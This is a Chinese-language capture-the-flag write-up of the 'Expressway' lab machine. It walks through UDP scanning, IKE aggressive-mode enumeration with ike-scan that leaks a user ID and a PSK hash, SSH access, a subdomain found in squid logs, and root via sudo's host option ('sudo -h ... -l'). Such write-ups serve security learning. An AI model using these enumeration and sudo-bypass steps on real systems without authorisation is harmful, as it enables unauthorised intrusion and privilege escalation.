Nmap #
[root@Hacking] /home/kali/expressway
❯ nmap expressway.htb -A
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
看起来tcp端口只开放了22的ssh服务,接下来扫描一下udp端口
[root@Hacking] /home/kali/expressway
❯ nmap expressway.htb -sU --top-ports 100
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
其中500端口isakmp服务,可以参考hacktricks的介绍
What Is ISAKMP ? #
- 这是 IPsec VPN(虚拟专用网络)关键端口,用于建立安全隧道的第一步:协商加密算法、认证方式、密钥交换。
- IKE 在 ISAKMP 框架下工作,分阶段建立安全关联(SA):
- Phase 1:建立 IKE 安全通道(PSK 预共享密钥或证书认证,Main/Aggressive Mode)。
- Phase 1.5:可选扩展认证(XAuth,用户名+密码)。
- Phase 2:协商 ESP/AH 加密参数,生成数据传输的密钥(支持 Perfect Forward Secrecy)。
- 常见配套端口
4500/udp→ NAT-T (NAT Traversal),穿越 NAT 的 IKE/ESP 通道。
ike-scan #
[root@Hacking] /home/kali/expressway
❯ ike-scan -M expressway.htb
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Main Mode Handshake returned
HDR=(CKY-R=aad8df0209c6ca2b)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
- 服务确认:目标
expressway.htb正在运行 IKE (UDP/500) 并接受你的提议。 - 加密套件:
- Enc=3DES:三重 DES 加密
- Hash=SHA1:完整性校验
- Group=2(modp1024):DH 组 2(1024 位,较弱)
- Auth=PSK:使用预共享密钥 (Pre-Shared Key)
- LifeDuration=28800 秒(密钥有效期约 8 小时)
- 扩展功能:
VID=09002689dfd6b712 (XAUTH)→ 支持 XAuth 用户名/密码扩展认证。Dead Peer Detection→ 用于检测 VPN 对端是否存活。
Bruteforcing-ID #
接下来使用暴力破解,发现存在用户ike
[root@Hacking] /home/kali/expressway
❯ ike-scan -P -M -A -n fakeID expressway.htb ⏎
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=ca95cb3e3af2d7ef)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
68e23758b679b05604e5a16c5c425afc128d8488b7b8e1d4271940cb758ceaf8ec70f3ee4c351c9fa4fc608bea66c1e349887915510b5fa5801ba2d0ea1b04c34f90d71a110282c920a087b5bac426fcf2c256b474ead1519ae7be49f6bb34a459<skip>
Ending ike-scan 1.9.6: 1 hosts scanned in 0.079 seconds (12.59 hosts/sec). 1 returned handshake; 0 returned notify
拿到哈希进行破解PSK
User #
ssh连接拿到user
Root #
查看当前用户的所属组,发现了proxy组,然后查找拥有的目录
ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:~$ find / -group proxy -type d 2>/dev/null
/run/squid
/var/spool/squid
/var/log/squid
在其中一个文件中发现了一个子域名offramp.expressway.htb
ike@expressway:/var/log/squid$ ls -al
total 28
drwxr-xr-x 2 proxy proxy 4096 Sep 16 16:02 .
drwxr-xr-x 12 root root 4096 Sep 21 02:55 ..
-rw-r----- 1 proxy proxy 4778 Jul 23 01:19 access.log.1
-rw-r----- 1 proxy proxy 20 Jul 22 19:32 access.log.2.gz
-rw-r----- 1 proxy proxy 2192 Jul 23 01:47 cache.log.1
-rw-r----- 1 proxy proxy 941 Jul 23 01:47 cache.log.2.gz
ike@expressway:/var/log/squid$ cat access.log.1 | grep htb
1753229688.902 0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
同时注意到,sudo的位置很不寻常,通常来说都是在/usr/bin目录下
ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
搜索一下,找到一个漏洞
ike@expressway:~$ sudo -h offramp.expressway.htb -l
Matching Defaults entries for ike on offramp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User ike may run the following commands on offramp:
(root) NOPASSWD: ALL
(root) NOPASSWD: ALL
可以看到畅通无阻了
